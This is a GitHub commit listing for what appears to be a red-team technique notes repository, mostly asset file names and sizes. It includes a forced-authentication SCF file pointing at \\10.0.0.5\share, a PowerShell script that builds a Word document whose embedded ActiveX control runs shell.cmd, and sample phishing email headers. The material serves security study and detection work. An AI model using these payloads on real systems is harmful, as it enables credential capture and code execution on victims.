Skip to content

Commit 4bc6188

Browse files
author
root
committed
first commit
0 parents  commit 4bc6188

File tree

1,125 files changed

+15087
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

1,125 files changed

+15087
-0
lines changed

.gitbook/assets/account-add.png

40.2 KB

.gitbook/assets/account-created.png

53.4 KB

.gitbook/assets/account-events.png

85.2 KB

.gitbook/assets/ads-benign.png

14.4 KB

.gitbook/assets/ads-commandline.png

45.7 KB

.gitbook/assets/ads-evil-2.png

33.7 KB

.gitbook/assets/ads-evil.png

33.8 KB

.gitbook/assets/ads-evil3.png

12.6 KB

.gitbook/assets/ads-powershell.png

70.2 KB

.gitbook/assets/agent-beaconing.png

84.3 KB
126 KB

.gitbook/assets/agent-procmon.png

124 KB

.gitbook/assets/attrib-nofile.png

56.1 KB

.gitbook/assets/attrib-reveal.png

10.2 KB

.gitbook/assets/attrib-set.png

9.33 KB

.gitbook/assets/batch-powershell.png

25.6 KB

.gitbook/assets/bits-cmdline.png

14.9 KB

.gitbook/assets/bits-download.png

12.7 KB
70.3 KB

.gitbook/assets/capcom.sys

10.3 KB
Binary file not shown.

.gitbook/assets/carets.png

41.8 KB

.gitbook/assets/certs-add-with-ps.png

26.3 KB

.gitbook/assets/certs-certutil.png

27.7 KB

.gitbook/assets/certs-installed.png

57.5 KB

.gitbook/assets/certs-logs.png

51 KB

.gitbook/assets/certs-ps-logging.png

16.3 KB

.gitbook/assets/certs-registry.png

39.3 KB

.gitbook/assets/certutil-decoded.png

9.39 KB

.gitbook/assets/certutil-download.gif

91 KB

.gitbook/assets/certutil-encoded.png

50.5 KB

.gitbook/assets/certutil-shellphp.png

28.3 KB

.gitbook/assets/certutil-sysmon.png

38.6 KB

.gitbook/assets/cmstp-kibana (1).png

16.2 KB

.gitbook/assets/cmstp-kibana.png

25 KB

.gitbook/assets/cmstp-rundll32.png

18.5 KB

.gitbook/assets/com-powershell.png

7.53 KB

.gitbook/assets/com-registry.png

32.2 KB

.gitbook/assets/com-sysmon.png

31.7 KB

.gitbook/assets/comasemicoma.png

34.4 KB
Binary file not shown.
Binary file not shown.

.gitbook/assets/daily-report.eml

+54
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
Delivered-To: mantvydo@gmail.com
2+
Received: by 2002:ab0:232:0:0:0:0:0 with SMTP id 47csp4855103uas;
3+
Tue, 29 Jan 2019 13:59:31 -0800 (PST)
4+
X-Google-Smtp-Source: ALg8bN5GPgy4/2kmKe8q8kCroUASJBEYQgVuCEvagozf65+qsuui0ZMZZCdBPWCQpyRPn4ZPHb7m
5+
X-Received: by 2002:ac8:1a92:: with SMTP id x18mr28052057qtj.179.1548799171548;
6+
Tue, 29 Jan 2019 13:59:31 -0800 (PST)
7+
ARC-Seal: i=1; a=rsa-sha256; t=1548799171; cv=none;
8+
d=google.com; s=arc-20160816;
9+
b=ocaDksuA42+hwvrJwuitSaxl89WYwCNmQTm0spPljGvNH0YbvgFfdIFkDCQ9IjngTZ
10+
PWcGE5j6g6te+Dg0e+Y4ihNZ8qMG1doGHveXbbf0NsNMPN6CeD3Y2kplLCn/mv6r8vVY
11+
vl1+ME+5z23rnGZQvJZ1VY2i6T04sEOLxdaIWtrq9w55NGlqhLW1U+qmB4C1pzhV1RBS
12+
6BV74XeD8MIdWvc5fNqc3awjYM+tQ6hruHtp64p/Nwzdc6JFL3mt+BYNBbr7neaVyC0A
13+
i4MhrFA2MbPuhMlUcZa9sgFJK3jdCNY7WensibiQccsqVwURwNCeVlmSSWWklf8z9og2
14+
5ZjQ==
15+
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
16+
h=subject:from:dkim-signature:to:message-id:date;
17+
bh=+RJ37zbngs83OUUyCgNCYUveGlSXILMY6G6wMcVzG4w=;
18+
b=nzsIG10M0CWT95MbAQRtZrPVqhfjyZdWBwqDTgYw4XqjjLLbXgIaDkoj+Smm7Ze1Ug
19+
clx5VXs2rwZnnvPnCQ3p+l4+2JakWaY49VdOLa2v2B/jo+yIUsW8Pogpsdx3DaoJOcE8
20+
tgaHNMm2Zm041raNFVjKRPqqWWOvppAyb4uztddWqHklhK1w7dsp2+VKYuOqByDbQAPC
21+
S346CeEuxfp8vrpDBDcDrCYHm5ZcAiXMbosOgMPs4gELSMSRzkQEmaoYl+EqFQJ3GJ7m
22+
rNsUr1xN+/OCTVKaVs8yQm+jAutcYJBr3amXiHJXXk03wIqpPXagy0W94rBITtQyVo4u
23+
B80w==
24+
ARC-Authentication-Results: i=1; mx.google.com;
25+
dkim=pass (test mode) header.i=@redteam.me header.s=mail header.b=eh7ARy9T;
26+
spf=pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) smtp.mailfrom=olasenor@redteam.me;
27+
dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=redteam.me
28+
Return-Path: <olasenor@redteam.me>
29+
Received: from redteam.me (redteam.me. [142.93.178.204])
30+
by mx.google.com with ESMTP id b48si709867qtk.45.2019.01.29.13.59.31
31+
for <mantvydo@gmail.com>;
32+
Tue, 29 Jan 2019 13:59:31 -0800 (PST)
33+
Received-SPF: pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) client-ip=142.93.178.204;
34+
Authentication-Results: mx.google.com;
35+
dkim=pass (test mode) header.i=@redteam.me header.s=mail header.b=eh7ARy9T;
36+
spf=pass (google.com: domain of olasenor@redteam.me designates 142.93.178.204 as permitted sender) smtp.mailfrom=olasenor@redteam.me;
37+
dmarc=pass (p=REJECT sp=REJECT dis=NONE) header.from=redteam.me
38+
Date: Tue, 29 Jan 2019 13:59:31 -0800 (PST)
39+
Message-Id: <5c50ccc3.1c69fb81.50027.b91fSMTPIN_ADDED_MISSING@mx.google.com>
40+
to: Mantvydas Baranauskas <mantvydo@gmail.com>
41+
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=redteam.me; s=mail;
42+
t=1548799170; bh=+RJ37zbngs83OUUyCgNCYUveGlSXILMY6G6wMcVzG4w=;
43+
h=to:from:subject:From;
44+
b=eh7ARy9TVTw1r3i47fuQYxVih0dhl1MC66NzdKinL7eUF1KKjaG3fA8z3X13dupG1
45+
BlfdIwCekfR8dRVkMQkBvBapYUiRXGhSnkdIl+kqjwS1rIgGA/OtHL3Eyr+EL02IFw
46+
dmz41GG4lGl6RUTahwk3WEJy295CaAiVjy4EQZeaJUR8s5IPTHnzmnTtryvc31IZmr
47+
dsoPoPIv+F9mEi/zD5f3IOXkIquv/OAAB98WbF4mQul1k7d9MiaMj1vXTUuRwAeSzW
48+
hCssWNxBgUnye7GQC5HVFIIUM5Vfbk4hQmaxBUUqbJx1UasBvZt3F6YUWRKPh/jPb0
49+
nFvPNScYJKQlw==
50+
from: Ola Senor <olasenor@redteam.me>
51+
subject: daily report
52+
53+
Hey Mantvydas,
54+
As you were requesting last week - attaching as promised the documents needed to keep the project going forward.
136 KB

.gitbook/assets/dcom-connection2.png

78.3 KB

.gitbook/assets/dcom-listening.png

76.5 KB

.gitbook/assets/dcom-logon-event.png

99.7 KB

.gitbook/assets/dcom-mmc-bind.png

89.5 KB

.gitbook/assets/dcom-rce (1).png

157 KB

.gitbook/assets/dcom-rce.png

157 KB

.gitbook/assets/dcom-registry.png

27.7 KB

.gitbook/assets/dcom-registry2.png

182 KB
48.8 KB

.gitbook/assets/dcshadow-delete1.png

42.6 KB

.gitbook/assets/dcshadow-delete2.png

45.1 KB

.gitbook/assets/dcshadow-logs.png

61.3 KB

.gitbook/assets/dcshadow-ou-dc.png

46.1 KB
42.1 KB

.gitbook/assets/dcshadow-services.png

84.4 KB

.gitbook/assets/dcshadow-traffic.png

51.3 KB

.gitbook/assets/dde-insert-field.png

36.9 KB

.gitbook/assets/dde-merge.png

7.73 KB

.gitbook/assets/dde-payload.png

12.4 KB

.gitbook/assets/dde-procexp.png

8.91 KB

.gitbook/assets/dde-prompt1.png

17 KB

.gitbook/assets/dde-prompt2.png

17.4 KB

.gitbook/assets/dde-sysmon.png

14.3 KB

.gitbook/assets/dde-toggle-code.png

19.9 KB

.gitbook/assets/dll-logs (1).png

25.8 KB

.gitbook/assets/dll-logs.png

26.9 KB

.gitbook/assets/dll-missing.png

16.8 KB

.gitbook/assets/dll-moved.png

39.8 KB

.gitbook/assets/dll-noparent.png

16.2 KB

.gitbook/assets/dll-rundll.png

56 KB

.gitbook/assets/dll-shell.png

22.4 KB

.gitbook/assets/dll-success.png

27.8 KB

.gitbook/assets/dns-packets.pcapng

12.1 KB
Binary file not shown.

.gitbook/assets/doc3.dotm

30.2 KB
Binary file not shown.
38 KB
33.2 KB
27.6 KB
19.5 KB
19.5 KB

.gitbook/assets/domains-nltest.png

31.8 KB
28.6 KB

.gitbook/assets/domains-trusts1.png

53.4 KB

.gitbook/assets/domains-trusts2.png

97.2 KB

.gitbook/assets/double-quotes.png

36.2 KB

.gitbook/assets/empire-1st-agent.png

47.5 KB

.gitbook/assets/empire-4103.png

196 KB

.gitbook/assets/empire-800.png

144 KB
23.6 KB

.gitbook/assets/empire-creds.png

70.6 KB
67.9 KB
66 KB

.gitbook/assets/empire-get-dcname.png

31.1 KB
176 KB
175 KB

.gitbook/assets/empire-krbtgt-sid.png

61.2 KB
161 KB
1.18 MB

.gitbook/assets/empire-listener.png

133 KB

.gitbook/assets/empire-mimikatz.png

149 KB

.gitbook/assets/empire-ps (1).png

12.7 KB

.gitbook/assets/empire-ps.png

12.7 KB

.gitbook/assets/empire-stager (1).png

139 KB

.gitbook/assets/empire-stager (2).png

200 KB
3.81 MB

.gitbook/assets/empire-stager.png

139 KB
13.8 KB

.gitbook/assets/empire-stealtoken.png

52.1 KB

.gitbook/assets/empire-transcript.png

201 KB

.gitbook/assets/empire-trusts.png

59.1 KB

.gitbook/assets/empire-volatility.png

318 KB
53.2 KB
95.3 KB
86.5 KB
98.9 KB
111 KB
56.9 KB

.gitbook/assets/evil.docx

11.5 KB
Binary file not shown.

.gitbook/assets/evil64.dll

5 KB
Binary file not shown.

.gitbook/assets/evilm64 (1).dll

5 KB
Binary file not shown.

.gitbook/assets/evilm64.dll

5 KB
Binary file not shown.

.gitbook/assets/evilpwfilter.dll

59 KB
Binary file not shown.
Binary file not shown.

.gitbook/assets/fa.scf

+5
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
[Shell]
2+
Command=2
3+
IconFile=\\10.0.0.5\share\pentestlab.ico
4+
[Taskbar]
5+
Command=ToggleDesktop
277 KB
61 KB
56.3 KB
20.8 KB

.gitbook/assets/forced-auth-scf.png

52.8 KB
21.5 KB
38.5 KB

.gitbook/assets/forced-auth-shell.png

33.7 KB

.gitbook/assets/forced-auth-word.png

71.6 KB
267 KB
61 KB
61.4 KB

.gitbook/assets/forcoding-python.png

47.9 KB

.gitbook/assets/forcoding.png

74.1 KB

.gitbook/assets/forfiles-ancestry.png

18.1 KB

.gitbook/assets/forfiles-cmdline.png

32 KB

.gitbook/assets/forfiles-executed.png

43.8 KB

.gitbook/assets/forms.html.docx

10.7 KB
Binary file not shown.

.gitbook/assets/forms.html.ps1

+40
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
# target file path
2+
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
3+
$progid = 'Forms.HTML:Image.1'
4+
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
5+
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/shell.cmd">'
6+
7+
# load assemblies for changing the docx (zip) file
8+
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
9+
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
10+
11+
# create new Word document
12+
$word = New-Object -ComObject Word.Application
13+
$word.Visible = $false
14+
$doc = $word.documents.add()
15+
16+
$shape = $doc.InlineShapes.AddOLEControl($progid)
17+
18+
# save doc & close Word
19+
$doc.SaveAs($filename)
20+
$doc.Close($false)
21+
$word.Quit()
22+
23+
# create temp folder for modifying the docx
24+
$tmpfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
25+
$null = New-Item -Type directory -Path $tmpfolder
26+
27+
# unzip and replace ActiveX object
28+
[System.IO.Compression.ZipFile]::ExtractToDirectory($filename, $tmpfolder)
29+
Remove-Item "$tmpfolder\word\activeX\activeX1.bin"
30+
31+
$clsid = ([GUID]$clsid).ToByteArray()
32+
$clsid | Set-Content "$tmpfolder\word\activeX\activeX1.bin" -Encoding Byte
33+
$html | Add-Content "$tmpfolder\word\activeX\activeX1.bin" -Encoding Unicode
34+
35+
# rezip
36+
Remove-Item $filename
37+
[System.IO.Compression.ZipFile]::CreateFromDirectory($tmpfolder, $filename)
38+
39+
# cleanup
40+
Remove-Item $tmpfolder -Force -Recurse

.gitbook/assets/garbage1.png

31.9 KB

.gitbook/assets/garbage2.png

103 KB

.gitbook/assets/garbage3.png

11.8 KB

.gitbook/assets/headers-removed.txt

+38
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
Delivered-To: mantvydo@gmail.com
2+
Received: by 2002:a81:1157:0:0:0:0:0 with SMTP id 84-v6csp5668508ywr;
3+
Wed, 3 Oct 2018 03:47:35 -0700 (PDT)
4+
X-Google-Smtp-Source: ACcGV614wuffoVOsvFkTPPxCiRj0hgFwTIH7y3B4ziIaXfogLFjsoiFyYOdNVChhr+oRcL1axO+a
5+
X-Received: by 2002:a17:902:a9cc:: with SMTP id b12-v6mr988630plr.198.1538563655360;
6+
Wed, 03 Oct 2018 03:47:35 -0700 (PDT)
7+
ARC-Seal: i=1; a=rsa-sha256; t=1538563655; cv=none;
8+
d=google.com; s=arc-20160816;
9+
b=qhbzI+R3vHbkqwp2ALOEQ0ItUXU/fA1kEmYln1dBe0CmLELuIfourst4gZVYiU0tAf
10+
sRx20Z5Vcqvv9w6s6f2gVp6crlOuoX2cSKJCn/HyRYKiDB5aVKpEYTDjQtGEBRLoL9xm
11+
/T8+3PgV6CHy/KowoPeLugKg3t5mIh9pq+Ig8gG+VVKZcFyvUBJa9YEgBgVKcMwew8H6
12+
x8WzIB2zyavpZLnbIi6SrtheYZAeSTMTwXRutqxZl0n4O/iZS4Y+ZVdRlYeXFXFNdtMK
13+
JFaS1XVLR4hYXOzlQT1IC2yeQlqf+Q3FJukmkDlDTgw91ImfZa0HtQYQoo3LwKotp92Q
14+
1HiQ==
15+
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
16+
h=from:date:message-id;
17+
bh=hZH42YPrA1C1YyKkQ/LM0S6pyh9p5LGmoqE/s4CGGts=;
18+
b=Squ71HtAuuwYHfX+4z63WcgBMoiKbcX5KAQLKwfvlnXuF5QEJNHjfX0GwekViXJIZ5
19+
D2v03648ni6W3/b6uXVoecrtX0MZ9Z/Ck+LxcJRi16toE4QfjR6fhX5l9OSKFjgqkst3
20+
Exk9yB1iiX8IAoIvnSaT0pQ5UzOov5Yneti3HO8QbzeCnT1/HieLwIhB/d+znryw1mTQ
21+
jj/VBlNEGFEJhpXjS7cbQFHQEz3yGl1YTSNB3Kxp9T5a7+ncsW3pOAlfKqNYpVywSlBe
22+
s6OUSTZ/bEwVYP3dv9aHmbpOIV6rC8uPgUlm+SKYtlj9xiR9uXTtj21IbA0F1esFx+Up
23+
jAQw==
24+
ARC-Authentication-Results: i=1; mx.google.com;
25+
spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com
26+
Return-Path: <root@nodspot.com>
27+
Received: from ubuntu-s-1vcpu-1gb-sfo2-01 ([206.189.221.162])
28+
by mx.google.com with ESMTP id y11-v6si1190446plg.237.2018.10.03.03.47.35
29+
for <mantvydo@gmail.com>;
30+
Wed, 03 Oct 2018 03:47:35 -0700 (PDT)
31+
Received-SPF: pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) client-ip=206.189.221.162;
32+
Authentication-Results: mx.google.com;
33+
spf=pass (google.com: domain of root@nodspot.com designates 206.189.221.162 as permitted sender) smtp.mailfrom=root@nodspot.com
34+
Message-Id: <20181003104734.1871F42006E@kali>
35+
Date: Wed, 3 Oct 2018 11:47:28 +0100 (BST)
36+
From: root <root@nodspot.com>
37+
38+
removing traces like a sir

.gitbook/assets/ifeo-cmdline.png

21.9 KB

.gitbook/assets/ifeo-cmdline2.png

19.4 KB

.gitbook/assets/ifeo-notepad.png

7.41 KB

.gitbook/assets/ifeo-notepad2.png

13 KB
119 KB
109 KB

.gitbook/assets/inject-dll-shell.png

42.8 KB

.gitbook/assets/inject-dll.png

76.6 KB

.gitbook/assets/inject-ida.png

34.6 KB
87.6 KB
79.3 KB
42.3 KB

.gitbook/assets/inject-process.png

20.1 KB
31.3 KB
27.7 KB

.gitbook/assets/inject-shellcode.png

245 KB

.gitbook/assets/inject1 (1).exe

58.5 KB
Binary file not shown.

.gitbook/assets/inject1.exe

60 KB
Binary file not shown.
118 KB
25.5 KB
63.8 KB
41.1 KB
26.3 KB

.gitbook/assets/installutil-shell.png

26.2 KB

.gitbook/assets/installutils-csc.png

14.9 KB
1.4 KB
Binary file not shown.
634 KB

.gitbook/assets/kerberoast-4769.png

51.7 KB
11.5 KB
110 KB
24.2 KB
314 KB
325 KB
378 KB
165 KB
46.3 KB
12.5 KB
40.5 KB

.gitbook/assets/kerberoast-logs.png

40.5 KB
19.2 KB
25.9 KB
210 KB
51.1 KB

.gitbook/assets/kerberoast-setspn.png

42.6 KB
66.2 KB
70.7 KB
70.7 KB
52.1 KB

.gitbook/assets/kerberoast.pcap

4.32 KB
Binary file not shown.
369 KB
286 KB
218 KB
140 KB
76.7 KB
78.5 KB
32.8 KB

.gitbook/assets/kibana-cmdlines.png

127 KB

.gitbook/assets/lnk-clsid.png

49.7 KB

.gitbook/assets/lnk-connection.png

13.6 KB

.gitbook/assets/lnk-dissasm.png

22.5 KB

.gitbook/assets/lnk-dllmain (1).png

4.25 KB

.gitbook/assets/lnk-dllmain.png

4.25 KB

.gitbook/assets/lnk-sysmon (1).png

35.1 KB

.gitbook/assets/lnk-sysmon (2).png

32.5 KB

.gitbook/assets/lnk-sysmon.png

32.5 KB

.gitbook/assets/lsa-commandline.png

42.7 KB
46.1 KB
34.1 KB

.gitbook/assets/lsa-loaded-dll.png

34.1 KB
127 KB

.gitbook/assets/macro-ancestry.png

52.2 KB

.gitbook/assets/macro-shell.png

134 KB

.gitbook/assets/macro-victim.png

83.3 KB

.gitbook/assets/macros-body (1).png

48.4 KB

.gitbook/assets/macros-body.png

48.4 KB

.gitbook/assets/macros-code.png

28.5 KB

.gitbook/assets/macros-deflated.png

22.4 KB
38.8 KB

.gitbook/assets/macros-filename.png

7 KB

.gitbook/assets/macros-hex-shell.png

30.7 KB

.gitbook/assets/macros-olevba.png

88.8 KB

.gitbook/assets/malicious-process.PNG

12.8 KB

.gitbook/assets/masquerade-1.png

1.19 KB

.gitbook/assets/masquerade-10.png

3.18 KB

.gitbook/assets/masquerade-11.png

3.46 KB

.gitbook/assets/masquerade-12.png

15.7 KB

.gitbook/assets/masquerade-13.png

12.2 KB

.gitbook/assets/masquerade-14.png

50.9 KB

.gitbook/assets/masquerade-2.png

4.36 KB

.gitbook/assets/masquerade-3.png

2.11 KB

.gitbook/assets/masquerade-4.png

3.06 KB

.gitbook/assets/masquerade-5.png

29 KB

.gitbook/assets/masquerade-6.png

18.1 KB

.gitbook/assets/masquerade-7.png

1.77 KB

.gitbook/assets/masquerade-8.png

1.28 KB

.gitbook/assets/masquerade-9.png

1.09 KB
Binary file not shown.
Binary file not shown.

.gitbook/assets/monitor-loaddll.png

30.2 KB

.gitbook/assets/monitor-loaddll2.png

13.9 KB
44.5 KB

.gitbook/assets/monitor-shell.png

20.3 KB
17.6 KB

.gitbook/assets/monitor-sysmon.png

34.7 KB
22.2 KB

.gitbook/assets/msf-template-vt2.png

57.2 KB

.gitbook/assets/msf-template-vt3.png

77.3 KB

.gitbook/assets/msf-template.png

25.2 KB

.gitbook/assets/msf-vt4.png

56.5 KB

.gitbook/assets/msf-vt5.png

86.9 KB

.gitbook/assets/mshta-calc.png

24.8 KB

.gitbook/assets/mshta-calc2.png

14.3 KB

.gitbook/assets/mshta-commandline.png

33.2 KB
14.5 KB

.gitbook/assets/mshta-connection.png

14.5 KB

.gitbook/assets/mshta-url.png

21.7 KB

.gitbook/assets/netsh-ancestry.png

14.4 KB

.gitbook/assets/netsh-calc.png

72.9 KB

.gitbook/assets/netsh-code (1).png

21.2 KB

.gitbook/assets/netsh-code.png

21.2 KB

.gitbook/assets/netsh-logs1.png

14.8 KB

.gitbook/assets/netsh-logs2.png

6.54 KB

.gitbook/assets/netsh-procmon.png

66.6 KB

.gitbook/assets/netsh-registry.png

32 KB

.gitbook/assets/netshhelperbeacon.dll

43 KB
Binary file not shown.
55.5 KB

.gitbook/assets/ntds-hashdump (1).png

257 KB

.gitbook/assets/ntds-hashdump.png

257 KB

.gitbook/assets/ntdsutil-attacker.png

109 KB

.gitbook/assets/ntdsutil-cmdline.png

42.3 KB

.gitbook/assets/ntdsutil-procexp.png

19.2 KB

.gitbook/assets/ole-ancestry1.png

45.7 KB

.gitbook/assets/ole-ancestry2.png

44.9 KB

.gitbook/assets/ole-change-icon.png

69.7 KB

.gitbook/assets/ole-embedded-bin.png

6.87 KB

.gitbook/assets/ole-execution.png

92.2 KB

0 commit comments

Comments
 (0)